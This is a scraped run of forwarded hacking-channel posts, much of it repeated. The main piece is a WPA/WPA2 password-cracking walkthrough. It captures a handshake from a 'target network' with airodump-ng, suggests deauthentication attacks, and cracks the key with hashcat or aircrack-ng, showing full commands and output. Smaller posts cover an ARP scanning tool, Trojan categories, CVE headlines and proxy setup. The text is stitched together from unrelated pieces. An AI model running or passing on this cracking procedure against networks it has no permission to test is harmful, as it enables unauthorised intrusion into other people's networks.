Forwarded from UNDERCODER
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file
β β β Uππ»βΊπ«Δπ¬πβ β β β
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
D) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
E) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
Crack the Network Password
E) The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
F) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
Where the last two fields separated by : are the network name and password respectively.
If you would like to use hashcat without naive-hashcat see this page for info.
F) Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file
β β β Uππ»βΊπ«Δπ¬πβ β β β
hashcat.net
hashcat cap2hccapx - advanced password recovery
CAP-to-HCCAPX online converter page for WPA/WPA2
Forwarded from UNDERCODER
# download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
β β β Uππ»βΊπ«Δπ¬πβ β β β
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
References: github, Ru foro
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Unpatched 360 security desktop has dll hijacking vulnerability (DC: 210-2021)
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
https://dailycve.com/unpatched-360-security-desktop-has-dll-hijacking-vulnerability
Dailycve
Unpatched 360 security desktop has dll hijacking vulnerability | CVE
Details:
To help you properly arrange your computer's desktop documentation and configurations, 360 Secure Desktop is a desktop application management program.
In 360 Protected Desktop, there is a DLL hijacking flaw that can be used to run maliciousβ¦
Forwarded from DailyCVE
Dailycve
Malwarebytes security breach | CVE
Details:
Malwarebytes is a US Malwarebytes software program that provides computers with anti-malware features. The program is designed to survive malicious malware such as bugs, spyware, Trojan horses, worms, dialers, etc. On macOS, Malwarebytes beforeβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python Scapy tools developed for LAN tests and advanced reconnaissance.:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) : arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) # scans only selected peers in the local network reachable on eth2 interface
6) python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo
parallelization with subprocess per every -r lan (performance improvements)
8) choose a number of worker to delegate a subset of addresses (address_pool/num_workers)
vendor database intergration and representation (as netdiscover already does)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Python Scapy tools developed for LAN tests and advanced reconnaissance.:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) pip3 install scapy
2) pip3 install netaddr
3) git clone https://github.com/peppelinux/pyLAN-tools.git
4) : arpscan.py [-h] -i I [-r R [R ...]] [-t T]
[-exclude EXCLUDE [EXCLUDE ...]] [-only ONLY [ONLY ...]]
[-debug]
arpscan usage examples
5) # scans only selected peers in the local network reachable on eth2 interface
6) python2 arpscan.py -i eth2 -t 0.01 -only 1 2 3 4 5 6 7 8 9 10 50 150 200 250 251 252 253 254
10.21.0.75 bc:5f:f4:f4:d0:d9 (eth2)
10.21.0.254 d4:ca:6d:e6:6a:d7
# scans only selected networks
python2 arpscan.py -i eth2 -t 0.01 -r 192.168.0.0/24 192.168.1.0/24 172.17.0.0/12
192.168.1.1 08:00:27:7c:f9:41
7) arpscan todo
parallelization with subprocess per every -r lan (performance improvements)
8) choose a number of worker to delegate a subset of addresses (address_pool/num_workers)
vendor database intergration and representation (as netdiscover already does)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
peppelinux/pyLAN-tools
LAN hacking tools with Python and Scapy. Contribute to peppelinux/pyLAN-tools development by creating an account on GitHub.
Forwarded from DailyCVE
π΅Unpatched binary vulnerability exists in ABC viewing software(DC: 212-2021)
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
https://dailycve.com/unpatched-binary-vulnerability-exists-abc-viewing-software
Dailycve
Unpatched binary vulnerability exists in ABC viewing software | CVE
Details:
ABC Picture Viewer is a permanently free program for image viewing that turns on hardware acceleration intelligently and supports multiple image formats.
In the ABC picture watching program, there is a binary flaw which can be abused by attackersβ¦
Forwarded from DailyCVE
π΅Unpatched WPS Office has a denial of service vulnerability(DC 213-2021)
https://dailycve.com/wps-office-has-denial-service-vulnerability-0
https://dailycve.com/wps-office-has-denial-service-vulnerability-0
Forwarded from UNDERCODE NEWS
Apple drops exclusive features from its own software that it has illegally inserted as public sentiment deteriorates.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trojan Horse Programs
(1) Blackmail Trojan
This type of Trojan will encrypt, destroy, modify, copy, lock, and delete data. This type of Trojan uses the data in the user's system as a condition of extortion and releases it after the user pays the ransom.
(2) Mail-Finder Trojan
The task of this type of Trojan is to find all email contacts from its target email client. The Trojan can send the list to its creator. In some cases, phishing emails are used to forward themselves to these contacts through phishing emails without the victimβs knowledge, thereby self-propagating.
(3) Fake anti-virus Trojan horse
Such Trojans will send false messages to users informing them that their devices have been infected with viruses. Sometimes complex reports and scan results are used to show a high level of threat, making users panic. Then, the Trojan horse author charges users for virus removal services.
(4) Download Trojan
The purpose of this type of Trojan is to download other malware from the Internet without the device ownerβs knowledge.
(5) Botnet Trojan
Botnet Trojan horses are used to damage web browsers, infect other devices, force them to join the botnet army, and execute various cyber crimes.
(6) Backdoor/remote access Trojan
This type of Trojan allows cybercriminals to remotely access and control the intruding device, such as:
Access and modify files;
Restart the target system;
Install or uninstall other software;
Send and receive information with other connected IoT devices;
Get many other similar privileges.
(7) Spy Trojan
This type of Trojan, also known as spyware, monitors user behavior, such as surfing the Internet and what users type on websites and devices (such as personal information, financial data, login credentials, etc.). This information will then be used to perform identity theft crimes, financial fraud or ransomware attacks.
π¦Trojan Horse Programs
(1) Blackmail Trojan
This type of Trojan will encrypt, destroy, modify, copy, lock, and delete data. This type of Trojan uses the data in the user's system as a condition of extortion and releases it after the user pays the ransom.
(2) Mail-Finder Trojan
The task of this type of Trojan is to find all email contacts from its target email client. The Trojan can send the list to its creator. In some cases, phishing emails are used to forward themselves to these contacts through phishing emails without the victimβs knowledge, thereby self-propagating.
(3) Fake anti-virus Trojan horse
Such Trojans will send false messages to users informing them that their devices have been infected with viruses. Sometimes complex reports and scan results are used to show a high level of threat, making users panic. Then, the Trojan horse author charges users for virus removal services.
(4) Download Trojan
The purpose of this type of Trojan is to download other malware from the Internet without the device ownerβs knowledge.
(5) Botnet Trojan
Botnet Trojan horses are used to damage web browsers, infect other devices, force them to join the botnet army, and execute various cyber crimes.
(6) Backdoor/remote access Trojan
This type of Trojan allows cybercriminals to remotely access and control the intruding device, such as:
Access and modify files;
Restart the target system;
Install or uninstall other software;
Send and receive information with other connected IoT devices;
Get many other similar privileges.
(7) Spy Trojan
This type of Trojan, also known as spyware, monitors user behavior, such as surfing the Internet and what users type on websites and devices (such as personal information, financial data, login credentials, etc.). This information will then be used to perform identity theft crimes, financial fraud or ransomware attacks.
(don't copy any tutorial)β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Joomla! Cross-site scripting vulnerability :
https://dailycve.com/joomla-cross-site-scripting-vulnerability
https://dailycve.com/joomla-cross-site-scripting-vulnerability
Dailycve
Joomla! Cross-site scripting vulnerability | CVE
Details:
Joomla! is a world-renowned content management system. This is a software framework developed using the language of PHP and the database of MySQL. It will run on different platforms, including Linux, Windows, and MacOSX.
Hey! Joomla! 3.1.0β¦
Forwarded from DailyCVE
π΅Unpatched Awbs Advanced Webhost Billing System cross-site request forgery vulnerability:
https://dailycve.com/unpatched-awbs-advanced-webhost-billing-system-cross-site-request-forgery-vulnerability
https://dailycve.com/unpatched-awbs-advanced-webhost-billing-system-cross-site-request-forgery-vulnerability
Dailycve
Unpatched Awbs Advanced Webhost Billing System cross-site request forgery vulnerability | CVE
Details:
Awbs Advanced Webhost Billing System is a network billing management system based on Php, used in the United States to handle Awbs hosts. The platform can offer commercial facilities for web hosting and/or domain name registration, and can provideβ¦
Forwarded from UNDERCODE NEWS
German privacy agency reported that an online laptop and electronics store was fined EUR 10.4 million for staff control in breach of GDPR.
#International
#International
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ Configuring proxy settings in CentOS 8/7 | RHEL 8/7 and Fedora:
1) Configure system-wide proxy settings in the desktop interface
For users using a desktop environment on Fedora / CentOS and RHEL Linux, changes can be made in the system control panel.
Go to Settings > Network > Network Proxy
2) Select βManualβ to enter proxy settings.
3) Fill in the proxy values ββfor http, https and ftp.
If you have a SOCKS proxy, also set it accordingly.
After saving the changes, the system will automatically apply the new parameters.
4) Proxy in Firefox browser
If you have a Firefox browser, you need to update your proxy settings under Settings> Network Settings> Manual Proxy Settings.
5) Configure system-wide proxy settings in CLI
We will add a shell script file to /etc/profile.d/proxy.sh.
This will ensure that the settings are applied to all registered users.
sudo vi /etc/profile
Add proxy settings.
# set proxy config via profie.d - should apply for all users
#
PROXY_URL="http://10.10.1.10:8080/"
export http_proxy="$PROXY_URL"
export https_proxy="$PROXY_URL"
export ftp_proxy="$PROXY_URL"
export no_proxy="127.0.0.1,localhost"
# For curl
export HTTP_PROXY="$PROXY_URL"
export HTTPS_PROXY="$PROXY_URL"
export FTP_PROXY="$PROXY_URL"
export NO_PROXY="127.0.0.1,localhost"
Where:
10.10.1.10 - proxy server ip, can be replaced with hostname
8080 - proxy server port
If authentication is required, the syntax is:
http: // username: password @ proxyserver: proxyport /
then run:
$ source /etc/profile
Confirm :
$ env | grep -i proxy
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ Configuring proxy settings in CentOS 8/7 | RHEL 8/7 and Fedora:
1) Configure system-wide proxy settings in the desktop interface
For users using a desktop environment on Fedora / CentOS and RHEL Linux, changes can be made in the system control panel.
Go to Settings > Network > Network Proxy
2) Select βManualβ to enter proxy settings.
3) Fill in the proxy values ββfor http, https and ftp.
If you have a SOCKS proxy, also set it accordingly.
After saving the changes, the system will automatically apply the new parameters.
4) Proxy in Firefox browser
If you have a Firefox browser, you need to update your proxy settings under Settings> Network Settings> Manual Proxy Settings.
5) Configure system-wide proxy settings in CLI
We will add a shell script file to /etc/profile.d/proxy.sh.
This will ensure that the settings are applied to all registered users.
sudo vi /etc/profile
Add proxy settings.
# set proxy config via profie.d - should apply for all users
#
PROXY_URL="http://10.10.1.10:8080/"
export http_proxy="$PROXY_URL"
export https_proxy="$PROXY_URL"
export ftp_proxy="$PROXY_URL"
export no_proxy="127.0.0.1,localhost"
# For curl
export HTTP_PROXY="$PROXY_URL"
export HTTPS_PROXY="$PROXY_URL"
export FTP_PROXY="$PROXY_URL"
export NO_PROXY="127.0.0.1,localhost"
Where:
10.10.1.10 - proxy server ip, can be replaced with hostname
8080 - proxy server port
If authentication is required, the syntax is:
http: // username: password @ proxyserver: proxyport /
then run:
$ source /etc/profile
Confirm :
$ env | grep -i proxy
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from DailyCVE
π΅Eclipse Hawkbit access control error vulnerability:
https://dailycve.com/eclipse-hawkbit-access-control-error-vulnerability
https://dailycve.com/eclipse-hawkbit-access-control-error-vulnerability
Dailycve
Eclipse Hawkbit access control error vulnerability | CVE
Details:
Eclipse hawkBit is an Eclipse Foundation back-end domain-independent application. This product is used for rolling out app upgrades to computers with a restricted side.
Forwarded from DailyCVE
π΅DELL EMC Avamar Server SQL injection vulnerability(DC: 217-2021):
https://dailycve.com/dell-emc-avamar-server-sql-injection-vulnerability
https://dailycve.com/dell-emc-avamar-server-sql-injection-vulnerability
Dailycve
DELL EMC Avamar Server SQL injection vulnerability | CVE
Details:
DELL Dell EMC Avamar Cloud is a series of Dell EMC fully virtualized server backup and recovery tools (DELL).
There are SQL injection bugs on DELL EMC Avamar Server 19.1, 19.2, and 19.3. This vulnerability can be used by unauthenticated remoteβ¦